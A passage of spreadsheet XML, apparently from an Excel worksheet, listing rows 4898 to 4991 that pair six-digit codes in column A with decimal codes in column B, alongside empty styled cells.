      <c r="B4898" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D4898" s="5"/>
      <c r="E4898" s="3"/>
      <c r="F4898" s="1"/>
      <c r="H4898" s="1"/>
    </row>
    <row r="4899" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4899" s="5">
        <v>700150</v>
      </c>
      <c r="B4899" s="3">
        <v>901030</v>
      </c>
      <c r="D4899" s="5"/>
      <c r="E4899" s="3"/>
      <c r="F4899" s="1"/>
      <c r="H4899" s="1"/>
    </row>
    <row r="4900" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4900" s="5">
        <v>700150</v>
      </c>
      <c r="B4900" s="3">
        <v>901568.00199999998</v>
      </c>
      <c r="D4900" s="5"/>
      <c r="E4900" s="3"/>
      <c r="F4900" s="1"/>
      <c r="H4900" s="1"/>
    </row>
    <row r="4901" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4901" s="5">
        <v>700150</v>
      </c>
      <c r="B4901" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D4901" s="5"/>
      <c r="E4901" s="3"/>
      <c r="F4901" s="1"/>
      <c r="H4901" s="1"/>
    </row>
    <row r="4902" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4902" s="5">
        <v>700150</v>
      </c>
      <c r="B4902" s="3">
        <v>901546.00300000003</v>
      </c>
      <c r="D4902" s="5"/>
      <c r="E4902" s="3"/>
      <c r="F4902" s="1"/>
      <c r="H4902" s="1"/>
    </row>
    <row r="4903" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4903" s="5">
        <v>700150</v>
      </c>
      <c r="B4903" s="3">
        <v>901070.00600000005</v>
      </c>
      <c r="D4903" s="5"/>
      <c r="E4903" s="3"/>
      <c r="F4903" s="1"/>
      <c r="H4903" s="1"/>
    </row>
    <row r="4904" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4904" s="5">
        <v>700150</v>
      </c>
      <c r="B4904" s="3">
        <v>901105</v>
      </c>
      <c r="D4904" s="5"/>
      <c r="E4904" s="3"/>
      <c r="F4904" s="1"/>
      <c r="H4904" s="1"/>
    </row>
    <row r="4905" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4905" s="5">
        <v>700150</v>
      </c>
      <c r="B4905" s="3">
        <v>901027</v>
      </c>
      <c r="D4905" s="5"/>
      <c r="E4905" s="3"/>
      <c r="F4905" s="1"/>
      <c r="H4905" s="1"/>
    </row>
    <row r="4906" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4906" s="5">
        <v>700177</v>
      </c>
      <c r="B4906" s="3">
        <v>901055.01100000006</v>
      </c>
      <c r="D4906" s="5"/>
      <c r="E4906" s="3"/>
      <c r="F4906" s="1"/>
      <c r="H4906" s="1"/>
    </row>
    <row r="4907" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4907" s="5">
        <v>700139</v>
      </c>
      <c r="B4907" s="3">
        <v>901010</v>
      </c>
      <c r="D4907" s="5"/>
      <c r="E4907" s="3"/>
      <c r="F4907" s="1"/>
      <c r="H4907" s="1"/>
    </row>
    <row r="4908" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4908" s="5">
        <v>700139</v>
      </c>
      <c r="B4908" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D4908" s="5"/>
      <c r="E4908" s="3"/>
      <c r="F4908" s="1"/>
      <c r="H4908" s="1"/>
    </row>
    <row r="4909" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4909" s="5">
        <v>700139</v>
      </c>
      <c r="B4909" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D4909" s="5"/>
      <c r="E4909" s="3"/>
      <c r="F4909" s="1"/>
      <c r="H4909" s="1"/>
    </row>
    <row r="4910" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4910" s="5">
        <v>700139</v>
      </c>
      <c r="B4910" s="3">
        <v>901485</v>
      </c>
      <c r="D4910" s="5"/>
      <c r="E4910" s="3"/>
      <c r="F4910" s="1"/>
      <c r="H4910" s="1"/>
    </row>
    <row r="4911" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4911" s="5">
        <v>700139</v>
      </c>
      <c r="B4911" s="3">
        <v>901083</v>
      </c>
      <c r="D4911" s="5"/>
      <c r="E4911" s="3"/>
      <c r="F4911" s="1"/>
      <c r="H4911" s="1"/>
    </row>
    <row r="4912" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4912" s="5">
        <v>700139</v>
      </c>
      <c r="B4912" s="3">
        <v>901564.00399999996</v>
      </c>
      <c r="D4912" s="5"/>
      <c r="E4912" s="3"/>
      <c r="F4912" s="1"/>
      <c r="H4912" s="1"/>
    </row>
    <row r="4913" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4913" s="5">
        <v>700139</v>
      </c>
      <c r="B4913" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D4913" s="5"/>
      <c r="E4913" s="3"/>
      <c r="F4913" s="1"/>
      <c r="H4913" s="1"/>
    </row>
    <row r="4914" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4914" s="5">
        <v>700139</v>
      </c>
      <c r="B4914" s="3">
        <v>901105</v>
      </c>
      <c r="D4914" s="5"/>
      <c r="E4914" s="3"/>
      <c r="F4914" s="1"/>
      <c r="H4914" s="1"/>
    </row>
    <row r="4915" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4915" s="5">
        <v>700139</v>
      </c>
      <c r="B4915" s="3">
        <v>901027.00300000003</v>
      </c>
      <c r="D4915" s="5"/>
      <c r="E4915" s="3"/>
      <c r="F4915" s="1"/>
      <c r="H4915" s="1"/>
    </row>
    <row r="4916" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4916" s="5">
        <v>700139</v>
      </c>
      <c r="B4916" s="3">
        <v>901057</v>
      </c>
      <c r="D4916" s="5"/>
      <c r="E4916" s="3"/>
      <c r="F4916" s="1"/>
      <c r="H4916" s="1"/>
    </row>
    <row r="4917" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4917" s="5">
        <v>700139</v>
      </c>
      <c r="B4917" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D4917" s="5"/>
      <c r="E4917" s="3"/>
      <c r="F4917" s="1"/>
      <c r="H4917" s="1"/>
    </row>
    <row r="4918" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4918" s="5">
        <v>700139</v>
      </c>
      <c r="B4918" s="3">
        <v>901082</v>
      </c>
      <c r="D4918" s="5"/>
      <c r="E4918" s="3"/>
      <c r="F4918" s="1"/>
      <c r="H4918" s="1"/>
    </row>
    <row r="4919" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4919" s="5">
        <v>700139</v>
      </c>
      <c r="B4919" s="3">
        <v>901016</v>
      </c>
      <c r="D4919" s="5"/>
      <c r="E4919" s="3"/>
      <c r="F4919" s="1"/>
      <c r="H4919" s="1"/>
    </row>
    <row r="4920" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4920" s="5">
        <v>700139</v>
      </c>
      <c r="B4920" s="3">
        <v>901033</v>
      </c>
      <c r="D4920" s="5"/>
      <c r="E4920" s="3"/>
      <c r="F4920" s="1"/>
      <c r="H4920" s="1"/>
    </row>
    <row r="4921" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4921" s="5">
        <v>700139</v>
      </c>
      <c r="B4921" s="3">
        <v>901124</v>
      </c>
      <c r="D4921" s="5"/>
      <c r="E4921" s="3"/>
      <c r="F4921" s="1"/>
      <c r="H4921" s="1"/>
    </row>
    <row r="4922" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4922" s="5">
        <v>700441</v>
      </c>
      <c r="B4922" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D4922" s="5"/>
      <c r="E4922" s="3"/>
      <c r="F4922" s="1"/>
      <c r="H4922" s="1"/>
    </row>
    <row r="4923" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4923" s="5">
        <v>700441</v>
      </c>
      <c r="B4923" s="3">
        <v>901560.00100000005</v>
      </c>
      <c r="D4923" s="5"/>
      <c r="E4923" s="3"/>
      <c r="F4923" s="1"/>
      <c r="H4923" s="1"/>
    </row>
    <row r="4924" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4924" s="5">
        <v>700441</v>
      </c>
      <c r="B4924" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D4924" s="5"/>
      <c r="E4924" s="3"/>
      <c r="F4924" s="1"/>
      <c r="H4924" s="1"/>
    </row>
    <row r="4925" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4925" s="5">
        <v>700441</v>
      </c>
      <c r="B4925" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D4925" s="5"/>
      <c r="E4925" s="3"/>
      <c r="F4925" s="1"/>
      <c r="H4925" s="1"/>
    </row>
    <row r="4926" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4926" s="5">
        <v>700441</v>
      </c>
      <c r="B4926" s="3">
        <v>901059.005</v>
      </c>
      <c r="D4926" s="5"/>
      <c r="E4926" s="3"/>
      <c r="F4926" s="1"/>
      <c r="H4926" s="1"/>
    </row>
    <row r="4927" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4927" s="5">
        <v>700441</v>
      </c>
      <c r="B4927" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D4927" s="5"/>
      <c r="E4927" s="3"/>
      <c r="F4927" s="1"/>
      <c r="H4927" s="1"/>
    </row>
    <row r="4928" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4928" s="5">
        <v>700441</v>
      </c>
      <c r="B4928" s="3">
        <v>901041</v>
      </c>
      <c r="D4928" s="5"/>
      <c r="E4928" s="3"/>
      <c r="F4928" s="1"/>
      <c r="H4928" s="1"/>
    </row>
    <row r="4929" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4929" s="5">
        <v>700441</v>
      </c>
      <c r="B4929" s="3">
        <v>901564.00300000003</v>
      </c>
      <c r="D4929" s="5"/>
      <c r="E4929" s="3"/>
      <c r="F4929" s="1"/>
      <c r="H4929" s="1"/>
    </row>
    <row r="4930" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4930" s="5">
        <v>700441</v>
      </c>
      <c r="B4930" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D4930" s="5"/>
      <c r="E4930" s="3"/>
      <c r="F4930" s="1"/>
      <c r="H4930" s="1"/>
    </row>
    <row r="4931" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4931" s="5">
        <v>700441</v>
      </c>
      <c r="B4931" s="3">
        <v>901112</v>
      </c>
      <c r="D4931" s="5"/>
      <c r="E4931" s="3"/>
      <c r="F4931" s="1"/>
      <c r="H4931" s="1"/>
    </row>
    <row r="4932" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4932" s="5">
        <v>700441</v>
      </c>
      <c r="B4932" s="3">
        <v>901057</v>
      </c>
      <c r="D4932" s="5"/>
      <c r="E4932" s="3"/>
      <c r="F4932" s="1"/>
      <c r="H4932" s="1"/>
    </row>
    <row r="4933" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4933" s="5">
        <v>700441</v>
      </c>
      <c r="B4933" s="3">
        <v>901082</v>
      </c>
      <c r="D4933" s="5"/>
      <c r="E4933" s="3"/>
      <c r="F4933" s="1"/>
      <c r="H4933" s="1"/>
    </row>
    <row r="4934" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4934" s="5">
        <v>700441</v>
      </c>
      <c r="B4934" s="3">
        <v>901016</v>
      </c>
      <c r="D4934" s="5"/>
      <c r="E4934" s="3"/>
      <c r="F4934" s="1"/>
      <c r="H4934" s="1"/>
    </row>
    <row r="4935" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4935" s="5">
        <v>700441</v>
      </c>
      <c r="B4935" s="3">
        <v>901033</v>
      </c>
      <c r="D4935" s="5"/>
      <c r="E4935" s="3"/>
      <c r="F4935" s="1"/>
      <c r="H4935" s="1"/>
    </row>
    <row r="4936" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4936" s="5">
        <v>700145</v>
      </c>
      <c r="B4936" s="3">
        <v>901071.00399999996</v>
      </c>
      <c r="D4936" s="5"/>
      <c r="E4936" s="3"/>
      <c r="F4936" s="1"/>
      <c r="H4936" s="1"/>
    </row>
    <row r="4937" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4937" s="5">
        <v>700145</v>
      </c>
      <c r="B4937" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D4937" s="5"/>
      <c r="E4937" s="3"/>
      <c r="F4937" s="1"/>
      <c r="H4937" s="1"/>
    </row>
    <row r="4938" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4938" s="5">
        <v>700145</v>
      </c>
      <c r="B4938" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D4938" s="5"/>
      <c r="E4938" s="3"/>
      <c r="F4938" s="1"/>
      <c r="H4938" s="1"/>
    </row>
    <row r="4939" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4939" s="5">
        <v>700145</v>
      </c>
      <c r="B4939" s="3">
        <v>901564.00399999996</v>
      </c>
      <c r="D4939" s="5"/>
      <c r="E4939" s="3"/>
      <c r="F4939" s="1"/>
      <c r="H4939" s="1"/>
    </row>
    <row r="4940" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4940" s="5">
        <v>700145</v>
      </c>
      <c r="B4940" s="3">
        <v>901105</v>
      </c>
      <c r="D4940" s="5"/>
      <c r="E4940" s="3"/>
      <c r="F4940" s="1"/>
      <c r="H4940" s="1"/>
    </row>
    <row r="4941" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4941" s="5">
        <v>700145</v>
      </c>
      <c r="B4941" s="3">
        <v>901012</v>
      </c>
      <c r="D4941" s="5"/>
      <c r="E4941" s="3"/>
      <c r="F4941" s="1"/>
      <c r="H4941" s="1"/>
    </row>
    <row r="4942" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4942" s="5">
        <v>700194</v>
      </c>
      <c r="B4942" s="3">
        <v>901134</v>
      </c>
      <c r="D4942" s="5"/>
      <c r="E4942" s="3"/>
      <c r="F4942" s="1"/>
      <c r="H4942" s="1"/>
    </row>
    <row r="4943" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4943" s="5">
        <v>700194</v>
      </c>
      <c r="B4943" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D4943" s="5"/>
      <c r="E4943" s="3"/>
      <c r="F4943" s="1"/>
      <c r="H4943" s="1"/>
    </row>
    <row r="4944" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4944" s="5">
        <v>700194</v>
      </c>
      <c r="B4944" s="3">
        <v>901123</v>
      </c>
      <c r="D4944" s="5"/>
      <c r="E4944" s="3"/>
      <c r="F4944" s="1"/>
      <c r="H4944" s="1"/>
    </row>
    <row r="4945" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4945" s="5">
        <v>700194</v>
      </c>
      <c r="B4945" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D4945" s="5"/>
      <c r="E4945" s="3"/>
      <c r="F4945" s="1"/>
      <c r="H4945" s="1"/>
    </row>
    <row r="4946" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4946" s="5">
        <v>700194</v>
      </c>
      <c r="B4946" s="3">
        <v>901547.005</v>
      </c>
      <c r="D4946" s="5"/>
      <c r="E4946" s="3"/>
      <c r="F4946" s="1"/>
      <c r="H4946" s="1"/>
    </row>
    <row r="4947" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4947" s="5">
        <v>700194</v>
      </c>
      <c r="B4947" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D4947" s="5"/>
      <c r="E4947" s="3"/>
      <c r="F4947" s="1"/>
      <c r="H4947" s="1"/>
    </row>
    <row r="4948" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4948" s="5">
        <v>700194</v>
      </c>
      <c r="B4948" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D4948" s="5"/>
      <c r="E4948" s="3"/>
      <c r="F4948" s="1"/>
      <c r="H4948" s="1"/>
    </row>
    <row r="4949" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4949" s="5">
        <v>700194</v>
      </c>
      <c r="B4949" s="3">
        <v>901555.00399999996</v>
      </c>
      <c r="D4949" s="5"/>
      <c r="E4949" s="3"/>
      <c r="F4949" s="1"/>
      <c r="H4949" s="1"/>
    </row>
    <row r="4950" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4950" s="5">
        <v>700194</v>
      </c>
      <c r="B4950" s="3">
        <v>901005</v>
      </c>
      <c r="D4950" s="5"/>
      <c r="E4950" s="3"/>
      <c r="F4950" s="1"/>
      <c r="H4950" s="1"/>
    </row>
    <row r="4951" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4951" s="5">
        <v>700194</v>
      </c>
      <c r="B4951" s="3">
        <v>901482</v>
      </c>
      <c r="D4951" s="5"/>
      <c r="E4951" s="3"/>
      <c r="F4951" s="1"/>
      <c r="H4951" s="1"/>
    </row>
    <row r="4952" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4952" s="5">
        <v>700194</v>
      </c>
      <c r="B4952" s="3">
        <v>901574.00100000005</v>
      </c>
      <c r="D4952" s="5"/>
      <c r="E4952" s="3"/>
      <c r="F4952" s="1"/>
      <c r="H4952" s="1"/>
    </row>
    <row r="4953" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4953" s="5">
        <v>700194</v>
      </c>
      <c r="B4953" s="3">
        <v>901574.00699999998</v>
      </c>
      <c r="D4953" s="5"/>
      <c r="E4953" s="3"/>
      <c r="F4953" s="1"/>
      <c r="H4953" s="1"/>
    </row>
    <row r="4954" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4954" s="5">
        <v>700194</v>
      </c>
      <c r="B4954" s="3">
        <v>901574.00800000003</v>
      </c>
      <c r="D4954" s="5"/>
      <c r="E4954" s="3"/>
      <c r="F4954" s="1"/>
      <c r="H4954" s="1"/>
    </row>
    <row r="4955" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4955" s="5">
        <v>700194</v>
      </c>
      <c r="B4955" s="3">
        <v>901574.00899999996</v>
      </c>
      <c r="D4955" s="5"/>
      <c r="E4955" s="3"/>
      <c r="F4955" s="1"/>
      <c r="H4955" s="1"/>
    </row>
    <row r="4956" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4956" s="5">
        <v>700194</v>
      </c>
      <c r="B4956" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D4956" s="5"/>
      <c r="E4956" s="3"/>
      <c r="F4956" s="1"/>
      <c r="H4956" s="1"/>
    </row>
    <row r="4957" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4957" s="5">
        <v>700194</v>
      </c>
      <c r="B4957" s="3">
        <v>901027</v>
      </c>
      <c r="D4957" s="5"/>
      <c r="E4957" s="3"/>
      <c r="F4957" s="1"/>
      <c r="H4957" s="1"/>
    </row>
    <row r="4958" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4958" s="5">
        <v>700194</v>
      </c>
      <c r="B4958" s="3">
        <v>901027.005</v>
      </c>
      <c r="D4958" s="5"/>
      <c r="E4958" s="3"/>
      <c r="F4958" s="1"/>
      <c r="H4958" s="1"/>
    </row>
    <row r="4959" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4959" s="5">
        <v>700194</v>
      </c>
      <c r="B4959" s="3">
        <v>901003.00100000005</v>
      </c>
      <c r="D4959" s="5"/>
      <c r="E4959" s="3"/>
      <c r="F4959" s="1"/>
      <c r="H4959" s="1"/>
    </row>
    <row r="4960" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4960" s="5">
        <v>700194</v>
      </c>
      <c r="B4960" s="3">
        <v>901057</v>
      </c>
      <c r="D4960" s="5"/>
      <c r="E4960" s="3"/>
      <c r="F4960" s="1"/>
      <c r="H4960" s="1"/>
    </row>
    <row r="4961" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4961" s="5">
        <v>700194</v>
      </c>
      <c r="B4961" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D4961" s="5"/>
      <c r="E4961" s="3"/>
      <c r="F4961" s="1"/>
      <c r="H4961" s="1"/>
    </row>
    <row r="4962" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4962" s="5">
        <v>700194</v>
      </c>
      <c r="B4962" s="3">
        <v>901012</v>
      </c>
      <c r="D4962" s="5"/>
      <c r="E4962" s="3"/>
      <c r="F4962" s="1"/>
      <c r="H4962" s="1"/>
    </row>
    <row r="4963" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4963" s="5">
        <v>700194</v>
      </c>
      <c r="B4963" s="3">
        <v>901620</v>
      </c>
      <c r="D4963" s="5"/>
      <c r="E4963" s="3"/>
      <c r="F4963" s="1"/>
      <c r="H4963" s="1"/>
    </row>
    <row r="4964" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4964" s="5">
        <v>700194</v>
      </c>
      <c r="B4964" s="3">
        <v>901053.005</v>
      </c>
      <c r="D4964" s="5"/>
      <c r="E4964" s="3"/>
      <c r="F4964" s="1"/>
      <c r="H4964" s="1"/>
    </row>
    <row r="4965" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4965" s="5">
        <v>700194</v>
      </c>
      <c r="B4965" s="3">
        <v>901113</v>
      </c>
      <c r="D4965" s="5"/>
      <c r="E4965" s="3"/>
      <c r="F4965" s="1"/>
      <c r="H4965" s="1"/>
    </row>
    <row r="4966" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4966" s="5">
        <v>700194</v>
      </c>
      <c r="B4966" s="3">
        <v>901558.00300000003</v>
      </c>
      <c r="D4966" s="5"/>
      <c r="E4966" s="3"/>
      <c r="F4966" s="1"/>
      <c r="H4966" s="1"/>
    </row>
    <row r="4967" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4967" s="5">
        <v>700194</v>
      </c>
      <c r="B4967" s="3">
        <v>901552.00199999998</v>
      </c>
      <c r="D4967" s="5"/>
      <c r="E4967" s="3"/>
      <c r="F4967" s="1"/>
      <c r="H4967" s="1"/>
    </row>
    <row r="4968" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4968" s="5">
        <v>700194</v>
      </c>
      <c r="B4968" s="3">
        <v>901552.00600000005</v>
      </c>
      <c r="D4968" s="5"/>
      <c r="E4968" s="3"/>
      <c r="F4968" s="1"/>
      <c r="H4968" s="1"/>
    </row>
    <row r="4969" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4969" s="5">
        <v>700194</v>
      </c>
      <c r="B4969" s="3">
        <v>901047</v>
      </c>
      <c r="D4969" s="5"/>
      <c r="E4969" s="3"/>
      <c r="F4969" s="1"/>
      <c r="H4969" s="1"/>
    </row>
    <row r="4970" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4970" s="5">
        <v>700393</v>
      </c>
      <c r="B4970" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D4970" s="5"/>
      <c r="E4970" s="3"/>
      <c r="F4970" s="1"/>
      <c r="H4970" s="1"/>
    </row>
    <row r="4971" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4971" s="5">
        <v>700393</v>
      </c>
      <c r="B4971" s="3">
        <v>901070.00600000005</v>
      </c>
      <c r="D4971" s="5"/>
      <c r="E4971" s="3"/>
      <c r="F4971" s="1"/>
      <c r="H4971" s="1"/>
    </row>
    <row r="4972" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4972" s="5">
        <v>700393</v>
      </c>
      <c r="B4972" s="3">
        <v>901027</v>
      </c>
      <c r="D4972" s="5"/>
      <c r="E4972" s="3"/>
      <c r="F4972" s="1"/>
      <c r="H4972" s="1"/>
    </row>
    <row r="4973" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4973" s="5">
        <v>700393</v>
      </c>
      <c r="B4973" s="3">
        <v>901057</v>
      </c>
      <c r="D4973" s="5"/>
      <c r="E4973" s="3"/>
      <c r="F4973" s="1"/>
      <c r="H4973" s="1"/>
    </row>
    <row r="4974" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4974" s="5">
        <v>700393</v>
      </c>
      <c r="B4974" s="3">
        <v>901102.00199999998</v>
      </c>
      <c r="D4974" s="5"/>
      <c r="E4974" s="3"/>
      <c r="F4974" s="1"/>
      <c r="H4974" s="1"/>
    </row>
    <row r="4975" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4975" s="5">
        <v>700223</v>
      </c>
      <c r="B4975" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D4975" s="5"/>
      <c r="E4975" s="3"/>
      <c r="F4975" s="1"/>
      <c r="H4975" s="1"/>
    </row>
    <row r="4976" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4976" s="5">
        <v>700223</v>
      </c>
      <c r="B4976" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D4976" s="5"/>
      <c r="E4976" s="3"/>
      <c r="F4976" s="1"/>
      <c r="H4976" s="1"/>
    </row>
    <row r="4977" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4977" s="5">
        <v>700223</v>
      </c>
      <c r="B4977" s="3">
        <v>901059.005</v>
      </c>
      <c r="D4977" s="5"/>
      <c r="E4977" s="3"/>
      <c r="F4977" s="1"/>
      <c r="H4977" s="1"/>
    </row>
    <row r="4978" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4978" s="5">
        <v>700223</v>
      </c>
      <c r="B4978" s="3">
        <v>901059.00699999998</v>
      </c>
      <c r="D4978" s="5"/>
      <c r="E4978" s="3"/>
      <c r="F4978" s="1"/>
      <c r="H4978" s="1"/>
    </row>
    <row r="4979" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4979" s="5">
        <v>700223</v>
      </c>
      <c r="B4979" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D4979" s="5"/>
      <c r="E4979" s="3"/>
      <c r="F4979" s="1"/>
      <c r="H4979" s="1"/>
    </row>
    <row r="4980" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4980" s="5">
        <v>700223</v>
      </c>
      <c r="B4980" s="3">
        <v>901005</v>
      </c>
      <c r="D4980" s="5"/>
      <c r="E4980" s="3"/>
      <c r="F4980" s="1"/>
      <c r="H4980" s="1"/>
    </row>
    <row r="4981" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4981" s="5">
        <v>700223</v>
      </c>
      <c r="B4981" s="3">
        <v>901140</v>
      </c>
      <c r="D4981" s="5"/>
      <c r="E4981" s="3"/>
      <c r="F4981" s="1"/>
      <c r="H4981" s="1"/>
    </row>
    <row r="4982" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4982" s="5">
        <v>700223</v>
      </c>
      <c r="B4982" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D4982" s="5"/>
      <c r="E4982" s="3"/>
      <c r="F4982" s="1"/>
      <c r="H4982" s="1"/>
    </row>
    <row r="4983" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4983" s="5">
        <v>700223</v>
      </c>
      <c r="B4983" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D4983" s="5"/>
      <c r="E4983" s="3"/>
      <c r="F4983" s="1"/>
      <c r="H4983" s="1"/>
    </row>
    <row r="4984" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4984" s="5">
        <v>700223</v>
      </c>
      <c r="B4984" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D4984" s="5"/>
      <c r="E4984" s="3"/>
      <c r="F4984" s="1"/>
      <c r="H4984" s="1"/>
    </row>
    <row r="4985" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4985" s="5">
        <v>700223</v>
      </c>
      <c r="B4985" s="3">
        <v>901105</v>
      </c>
      <c r="D4985" s="5"/>
      <c r="E4985" s="3"/>
      <c r="F4985" s="1"/>
      <c r="H4985" s="1"/>
    </row>
    <row r="4986" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4986" s="5">
        <v>700223</v>
      </c>
      <c r="B4986" s="3">
        <v>901559.00100000005</v>
      </c>
      <c r="D4986" s="5"/>
      <c r="E4986" s="3"/>
      <c r="F4986" s="1"/>
      <c r="H4986" s="1"/>
    </row>
    <row r="4987" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4987" s="5">
        <v>700223</v>
      </c>
      <c r="B4987" s="3">
        <v>901559.00199999998</v>
      </c>
      <c r="D4987" s="5"/>
      <c r="E4987" s="3"/>
      <c r="F4987" s="1"/>
      <c r="H4987" s="1"/>
    </row>
    <row r="4988" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4988" s="5">
        <v>700223</v>
      </c>
      <c r="B4988" s="3">
        <v>901036.00399999996</v>
      </c>
      <c r="D4988" s="5"/>
      <c r="E4988" s="3"/>
      <c r="F4988" s="1"/>
      <c r="H4988" s="1"/>
    </row>
    <row r="4989" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4989" s="5">
        <v>700223</v>
      </c>
      <c r="B4989" s="3">
        <v>901027</v>
      </c>
      <c r="D4989" s="5"/>
      <c r="E4989" s="3"/>
      <c r="F4989" s="1"/>
      <c r="H4989" s="1"/>
    </row>
    <row r="4990" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4990" s="5">
        <v>700223</v>
      </c>
      <c r="B4990" s="3">
        <v>901027.00100000005</v>
      </c>
      <c r="D4990" s="5"/>
      <c r="E4990" s="3"/>
      <c r="F4990" s="1"/>
      <c r="H4990" s="1"/>
    </row>
    <row r="4991" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A4991" s="5">
        <v>700223</v>
      </c>
      <c r="B4991" s="3">
        <v>901057</v>
      </c>
